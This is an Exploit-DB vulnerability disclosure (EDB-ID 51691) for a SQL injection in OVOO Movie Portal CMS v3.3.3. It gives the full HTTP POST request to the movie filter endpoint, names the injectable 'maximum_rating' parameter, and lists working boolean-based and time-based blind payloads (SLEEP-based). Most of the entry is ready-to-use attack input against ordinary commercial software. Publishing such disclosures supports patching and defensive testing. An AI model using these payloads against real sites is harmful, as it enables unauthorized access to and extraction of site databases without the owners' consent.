OVOO Movie Portal CMS v3.3.3 - SQL Injection

EDB-ID:

51691

CVE:

N/A




Platform:

PHP

Date:

2023-08-21


# Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569
# Tested on: Kali Linux & MacOS
# CVE: N/A

### Request ###
POST /filter_movies/1 HTTP/2
Host: localhost
Cookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495us
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
Gecko/20100101 Firefox/116.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/movies.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Origin: htts://localhost
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
action=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1

### Parameter & Payloads ###
Parameter: maximum_rating (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND
2238=2238&page=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT
4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1